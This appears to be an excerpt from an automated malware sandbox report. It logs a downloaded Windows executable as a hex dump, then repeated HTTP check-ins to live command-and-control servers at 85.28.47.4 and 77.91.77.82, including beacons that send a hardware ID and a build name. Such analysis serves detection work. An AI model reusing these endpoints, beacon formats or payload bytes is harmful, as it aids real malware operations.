[TRUNCATED]
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$JdZaaa5ZaaRichPELAf! @0@ . @@@0!@@Pp# @0x#(@.data@!<!4@
                                            Jul 2, 2024 08:26:45.304558992 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d2 5c 3b f2 26 b0 48 a9 89 45 e7 68 88 51 36 89 1c 2d 8b 3c 52 ce c8 8a b1
                                            Data Ascii: \;&HEhQ6-<RA]grPE6]]*F$rxBI9VVoC2NTKue@Dby1<gN)M@\xH`+ip2;0;94{WYU}ho{2DbB)cn//9N
                                            Jul 2, 2024 08:26:45.304572105 CEST1236INData Raw: 50 6f 74 ac 86 95 fa c1 4f 47 8f dc 4e 18 15 6f f1 e5 0d 7b 14 f0 c0 17 fa a9 4e af c7 87 7e e4 b5 95 1a 92 78 3a 61 21 3a d8 d8 06 4f 84 6b e9 96 78 90 2f ec ee 76 0c bb 39 89 1c 02 e3 41 03 f8 ba 35 ff db 4c 02 be 30 0c 70 67 83 63 38 71 9d 72
                                            Data Ascii: PotOGNo{N~x:a!:Okx/v9A5L0pgc8qr&\6|2\1b:`-&poIu$.9'4IuNnENCeb;p6.)?3?%.f[)gAsGUQ8CvMr
                                            Jul 2, 2024 08:26:45.304677963 CEST1236INData Raw: bd f9 93 77 a1 2d 31 d6 bc 22 3c 58 5d 6f 42 3a e7 94 c4 98 68 cc dc eb 0e 26 ea aa d3 38 ad b4 70 40 47 c9 d3 3c 17 ea d8 cc 1d 51 f8 8f a6 78 2d df 10 2d 64 f5 61 be 45 b0 32 10 f2 42 fb 95 d7 5f 58 47 58 f8 4d fd 8d b8 3c ba dd 5b 11 4f 7c 1e
                                            Data Ascii: w-1"<X]oB:h&8p@G<Qx--daE2B_XGXM<[O|vs:"ZXv;@C>DB"12k#pRh|(MRM|moc!!@3D3g&"8d0^1I2$O0"&XEfAA,6W?AE;k[ {a
                                            Jul 2, 2024 08:26:45.304692030 CEST1236INData Raw: 54 21 90 fa 75 61 72 f4 a7 2e c9 19 54 15 54 3b 21 92 db a6 dd d1 55 2e 78 7d 20 62 84 33 d4 e6 9f 60 32 7a 03 0e 3f c3 03 08 26 60 c9 9c 39 d3 a2 ce ce 88 55 46 ce 23 e7 b4 14 f1 bb 1c 19 d9 bc 77 6b 59 63 ad 38 44 91 b7 d7 38 76 2d f8 43 e7 9f
                                            Data Ascii: T!uar.TT;!U.x} b3`2z?&`9UF#wkYc8D8v-CT7K]^|dOGm<|OJ_(w]4Uxg{zC(8=ccaH:l^<X)MnJzYP505!Hv30"R
                                            Jul 2, 2024 08:26:45.304704905 CEST1236INData Raw: 9c 15 84 59 ef e4 ac 90 a3 e8 34 46 ff 08 9e b2 97 88 61 98 02 d1 4f c4 f9 21 8c e7 a8 bb 4f c6 dd 03 87 d7 38 4b 50 75 81 71 7f bb c7 fb 2f 5b 19 99 76 88 7e 12 94 ee d0 af 7e 29 07 9c 5d 81 2d b6 4c 5a 85 20 49 1d 3b a9 67 37 54 3a f1 a0 3a c0
                                            Data Ascii: Y4FaO!O8KPuq/[v~~)]-LZ I;g7T::xf[]G,OOl&:'47 L]Q-h/\nUmvRlS_hY\uTUk(:J~E,ueHzgq2l<)ky
                                            Jul 2, 2024 08:26:45.304716110 CEST776INData Raw: b8 c5 92 a9 df 7f 7c bf de 76 2a f7 8f 49 e8 6a 72 13 34 e8 23 0c 9b e7 b9 66 29 1c 79 86 b3 e9 b8 73 8e d3 a8 d6 79 c2 f1 c8 f8 ae cc 2c 58 38 b0 9c ea 85 87 17 75 7f 35 a9 fe 02 41 dc ab dd 17 93 bd e5 b1 e0 34 3a 54 a9 5e 50 b9 46 d9 ee 77 6b
                                            Data Ascii: |v*Ijr4#f)ysy,X8u5A4:T^PFwkL-HyVO 7?-Zeh1|wLze!7 zYVr\3\<CUd<\}oy3bCb"^c;-tAEKq{;8%wTAo3^u"sv
                                            Jul 2, 2024 08:26:45.304729939 CEST1236INData Raw: 3a 67 5e 6c 22 57 8c bd 9c 7c 58 9a b0 e2 14 61 b7 9d 34 5e f0 01 f9 f0 10 32 09 00 76 97 e6 d9 b0 da 88 72 c2 5a 49 52 87 83 48 14 6e e7 59 de 41 0f 20 2a 25 65 52 e1 53 d3 23 ef 22 d2 f5 65 30 c5 ba cb eb 44 93 6d 04 80 ba 2b c1 96 89 ef bd dd
                                            Data Ascii: :g^l"W|Xa4^2vrZIRHnYA *%eRS#"e0Dm+}eMNCT6"(}z{o9'%B@`nFKpo;Hx&2D*V`+o9d*do?^0j:]R5}nwis$UEI1Nqb
                                            Jul 2, 2024 08:26:45.304883003 CEST1236INData Raw: c2 fd 8f 24 03 9f 03 6b e9 8f b7 6a da b4 fa 72 40 09 ac c1 81 76 34 e2 ec 2e 04 76 19 68 83 fd 16 26 23 62 51 e9 5b e2 4e fb b9 0b f9 2e 02 df a4 9b a2 ff c4 cd db 2d 39 01 23 5d 58 76 b0 47 1c 19 db 80 a5 2e f8 87 34 b8 31 29 61 72 6f 24 bd ec
                                            Data Ascii: $kjr@v4.vh&#bQ[N.-9#]XvG.41)aro$@MRy&C:IvEX=t*yH\32]}qKs@o?"gH%`:jmYnZI##N+N;vvAtMxWaF`R_
                                            Jul 2, 2024 08:26:45.304896116 CEST1236INData Raw: 33 75 23 9d fc 8e e7 50 b5 d6 2e 18 45 c2 29 94 25 9a bf 2d 8e d4 92 56 83 c5 00 5a 4a db c6 0d 72 e8 ae 5a c5 f4 1c 44 7f c9 47 f3 c3 89 7c f8 0d 6d ae 79 6c 9a d8 a8 4e c9 5a ed 10 2f d4 87 a9 c2 7b b2 7c 01 fb e0 aa e3 82 aa f0 83 62 a6 58 b8
                                            Data Ascii: 3u#P.E)%-VZJrZDG|mylNZ/{|bXR>5HF`uUP7r1X$t&GIw0Hn}u2e(!+)K^&0<QN5B14cmy*Xw4[,wv&'1e&
                                            Jul 2, 2024 08:26:45.309398890 CEST1236INData Raw: 74 9b 9b 02 38 86 59 0b 1d 9a ac dd 97 e7 59 e5 b5 34 a7 45 48 3c ce ed f8 ae 13 3c 23 44 f5 34 54 45 fa 17 7e 81 1c 40 7a f8 11 ab 67 1a 5c 1d a1 18 95 b8 b9 6e c0 7a 85 44 7b a8 9d 9e 05 10 d6 d6 e9 d4 3d e1 05 00 8b e1 dd 85 96 9e 7e 42 8d bf
                                            Data Ascii: t8YY4EH<<#D4TE~@zg\nzD{=~B<adAOK(V%B4NFD{/?!lolFa[`S]|h6]@`H*6F&$ Y$6iqOek||A(O/J8~;;


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.46389585.28.47.4807344C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:48.100478888 CEST408OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB
                                            Host: 85.28.47.4
                                            Content-Length: 211
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 44 30 46 45 31 37 31 41 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 2d 2d 0d 0a
                                            Data Ascii: ------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="hwid"8DD0FE171AAC3343412148------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="build"jony------HCAEGCBFHJDGCBFHDAFB--
                                            Jul 2, 2024 08:26:48.731944084 CEST211INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:48 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 8
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 59 6d 78 76 59 32 73 3d
                                            Data Ascii: YmxvY2s=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.46389677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:48.101499081 CEST179OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 31
                                            Cache-Control: no-cache
                                            Data Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                            Data Ascii: d1=1000006001&unit=246122658369
                                            Jul 2, 2024 08:26:48.810030937 CEST193INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 4 <c>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.46389777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:48.929022074 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:49.624799013 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:49.626451969 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:49.842972040 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.46389877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:49.993558884 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:50.709744930 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:50.710678101 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:50.937690973 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.46389977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:51.055756092 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:51.745115995 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:51.746107101 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:51.967161894 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.46390077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:52.084784031 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:52.809657097 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:52.810718060 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:53.042675972 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.46390177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:53.162875891 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:53.851845026 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:53.854784966 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:54.071007967 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.46390277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:54.181788921 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:54.876398087 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:54.877401114 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:55.097769976 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.46390377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:55.209729910 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:55.915065050 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:55.916137934 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:56.142941952 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.46390477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:56.256797075 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:56.960553885 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:56.961301088 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:57.180526972 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:57 GMT
